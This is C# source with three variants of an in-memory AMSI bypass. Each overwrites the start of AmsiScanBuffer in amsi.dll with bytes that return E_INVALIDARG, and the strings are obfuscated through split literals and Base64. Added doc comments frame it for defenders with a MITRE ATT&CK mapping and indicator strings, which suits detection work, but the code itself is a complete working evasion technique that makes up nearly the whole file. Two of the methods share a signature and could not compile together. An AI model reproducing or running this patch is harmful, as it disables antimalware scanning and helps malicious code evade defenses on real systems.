/// <summary>
/// Overwrites the first bytes of the AmsiScanBuffer export of amsi.dll with a caller-supplied
/// byte sequence: the library is loaded, the export is resolved, the protection of the target
/// range is changed to 0x40, and the bytes are copied over the function's entry point.
/// </summary>
/// <remarks>
/// Defender context: this is in-memory tampering with the Antimalware Scan Interface
/// (MITRE ATT&amp;CK T1562.001, Impair Defenses). Artifacts visible in this code:
/// the start of AmsiScanBuffer in memory no longer matches the on-disk amsi.dll image,
/// and the previous page protection is captured but never written back.
/// WinLibBase is not shown here; presumably P/Invoke wrappers over the Win32 functions
/// of the same names (confirm against its declaration).
/// </remarks>
/// <param name="magicJuice">
/// Bytes written over the function's entry point; its length is also the size passed to VirtualProtect.
/// </param>
private static void PathAnnsi(byte[] magicJuice)
{
    try
    {
        // The banner is written as split literals; concatenated it reads "[+] Patching AMSI ...".
        Console.WriteLine("[+] Patching AM" + "SI ...");

        // Split literals again: the values passed are "amsi.dll" and "AmsiScanBuffer".
        // Source-level string matching has to account for the split forms.
        IntPtr lib = WinLibBase.LoadLibrary("am" + "si.dll");
        IntPtr addr = WinLibBase.GetProcAddress(lib, "Am" + "siSca" + "nBuffer");

        // 0x40 is the Win32 PAGE_EXECUTE_READWRITE constant. oldProtect receives the prior
        // protection but is not used afterwards, so the range is left with the 0x40 protection.
        WinLibBase.VirtualProtect(addr, (UIntPtr)magicJuice.Length, 0x40, out var oldProtect);

        // Copies magicJuice over the function bytes starting at the export address.
        Marshal.Copy(magicJuice, 0, addr, magicJuice.Length);

        // Printed whenever no exception was thrown; the results of the native calls are not
        // inspected, so this line on its own does not show that memory was changed.
        Console.WriteLine("[+] Patched!");
    }
    catch (Exception ex)
    {
        // Failures are only reported on the console; nothing is rethrown to the caller.
        Console.WriteLine("[!] {0}", ex.Message);
        Console.WriteLine("[!] {0}", ex.InnerException);
    }
}
/// <summary>
/// Overwrites the entry point of AmsiScanBuffer in amsi.dll with a fixed byte sequence,
/// choosing between a 6-byte and an 8-byte sequence based on
/// <c>System.Environment.Is64BitOperatingSystem</c>.
/// </summary>
/// <remarks>
/// Defender context: in-memory tampering with the Antimalware Scan Interface
/// (MITRE ATT&amp;CK T1562.001, Impair Defenses). Indicators present in this block:
/// the Base64 literals "YW1zaS5kbGw=" (decodes to "amsi.dll") and "QW1zaVNjYW5CdWZmZXI="
/// (decodes to "AmsiScanBuffer"), and the constant byte arrays B8 57 00 07 80 C3 and
/// B8 57 00 07 80 C2 18 00. At run time the start of AmsiScanBuffer differs from the
/// on-disk image and the page protection is not restored.
/// WinLibBase and CopyData are not shown here; CopyData presumably copies the array to
/// the given address (confirm against its definition).
/// NOTE(review): a second method with this same name and signature appears on the page;
/// the two read as alternative variants and could not both be declared in one class.
/// </remarks>
/// <param name="BigBoy">Not read anywhere in this variant; the branch is selected from the environment instead.</param>
private static void MoveLifeAhead(bool BigBoy = false)
{
    try
    {
        // Library and export names are stored Base64-encoded and decoded at run time:
        // "YW1zaS5kbGw=" is "amsi.dll", "QW1zaVNjYW5CdWZmZXI=" is "AmsiScanBuffer".
        var fooBar = WinLibBase.LoadLibrary(Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));
        IntPtr addr = WinLibBase.GetProcAddress(fooBar, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));

        // 0x40 is the Win32 PAGE_EXECUTE_READWRITE constant.
        uint magicRastaValue = 0x40;
        // Receives the previous protection from VirtualProtect; never used to restore it.
        uint someNumber = 0;

        if (System.Environment.Is64BitOperatingSystem)
        {
            // x86-64 encoding of: mov eax, 0x80070057 ; ret
            // 0x80070057 is the HRESULT Windows defines as E_INVALIDARG, so the patched
            // function returns that error immediately instead of running its original body.
            var bigBoyBytes = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
            Console.WriteLine("[+] Patching...");
            WinLibBase.VirtualProtect(addr, (UIntPtr)bigBoyBytes.Length, magicRastaValue, out someNumber);
            CopyData(bigBoyBytes, addr);
            // Printed whenever no exception was thrown; native call results are not checked.
            Console.WriteLine("[+] Patched!");
        }
        else
        {
            // 32-bit x86 encoding of: mov eax, 0x80070057 ; ret 0x18
            // Same error value; "ret 0x18" also releases 24 bytes of stack arguments.
            var smallBoyBytes = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
            Console.WriteLine("[+] Patching ...");
            WinLibBase.VirtualProtect(addr, (UIntPtr)smallBoyBytes.Length, magicRastaValue, out someNumber);
            CopyData(smallBoyBytes, addr);
            Console.WriteLine("[+] Patched!");
        }
    }
    catch (Exception ex)
    {
        // Only the message is printed; the exception is not propagated.
        Console.WriteLine("[!] {0}", ex.Message);
    }
}
/// <summary>
/// Overwrites the entry point of AmsiScanBuffer in amsi.dll with a fixed byte sequence;
/// the caller's <paramref name="BigBoy"/> flag selects the 6-byte or the 8-byte sequence.
/// </summary>
/// <remarks>
/// Defender context: in-memory tampering with the Antimalware Scan Interface
/// (MITRE ATT&amp;CK T1562.001, Impair Defenses). Indicators present in this block:
/// the split literal "am" + "si.dll", the Base64 literal "QW1zaVNjYW5CdWZmZXI="
/// (decodes to "AmsiScanBuffer"), and the inline byte arrays B8 57 00 07 80 C3 and
/// B8 57 00 07 80 C2 18 00. At run time the start of AmsiScanBuffer differs from the
/// on-disk image and the page protection is not restored.
/// WinLibBase is not shown here; presumably P/Invoke wrappers over the Win32 functions
/// of the same names (confirm against its declaration).
/// NOTE(review): another method with this same name and signature appears on the page;
/// the two read as alternative variants and could not both be declared in one class.
/// </remarks>
/// <param name="BigBoy">
/// When true the 6-byte sequence ending in a plain ret is written; otherwise the 8-byte
/// sequence ending in ret 0x18 is written. Defaults to false.
/// </param>
private static void MoveLifeAhead(bool BigBoy = false)
{
    try
    {
        // The library name is a split literal ("amsi.dll"); the export name is decoded
        // from Base64 at run time ("AmsiScanBuffer").
        var fooBar = WinLibBase.LoadLibrary("am" + "si.dll");
        IntPtr addr = WinLibBase.GetProcAddress(fooBar, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));

        if (BigBoy)
        {
            Console.WriteLine("[+] Patching...");
            // Receives the previous protection; never used to restore it.
            uint someNumber = 0;
            // The same array literal is written out three times below: once for the size
            // (the cast applies to .Length), once as the copy source and once for the copy
            // length. Bytes are the x86-64 encoding of: mov eax, 0x80070057 ; ret
            // (0x80070057 is the HRESULT Windows defines as E_INVALIDARG).
            // 0x40 is the Win32 PAGE_EXECUTE_READWRITE constant.
            WinLibBase.VirtualProtect(addr, (UIntPtr) new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }.Length, 0x40, out someNumber);
            Marshal.Copy(new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }, 0, addr, new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }.Length);
            // Printed whenever no exception was thrown; native call results are not checked.
            Console.WriteLine("[+] Patched!");
        }
        else
        {
            Console.WriteLine("[+] Patching ...");
            uint someNumber = 0;
            // 32-bit x86 encoding of: mov eax, 0x80070057 ; ret 0x18
            // Same error value; "ret 0x18" also releases 24 bytes of stack arguments.
            WinLibBase.VirtualProtect(addr, (UIntPtr) new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }.Length, 0x40, out someNumber);
            Marshal.Copy(new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }, 0, addr, new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }.Length);
            Console.WriteLine("[+] Patched!");
        }
    }
    catch (Exception ex)
    {
        // Failures are only reported on the console; nothing is rethrown to the caller.
        Console.WriteLine("[!] {0}", ex.Message);
        Console.WriteLine("[!] {0}", ex.InnerException);
    }
}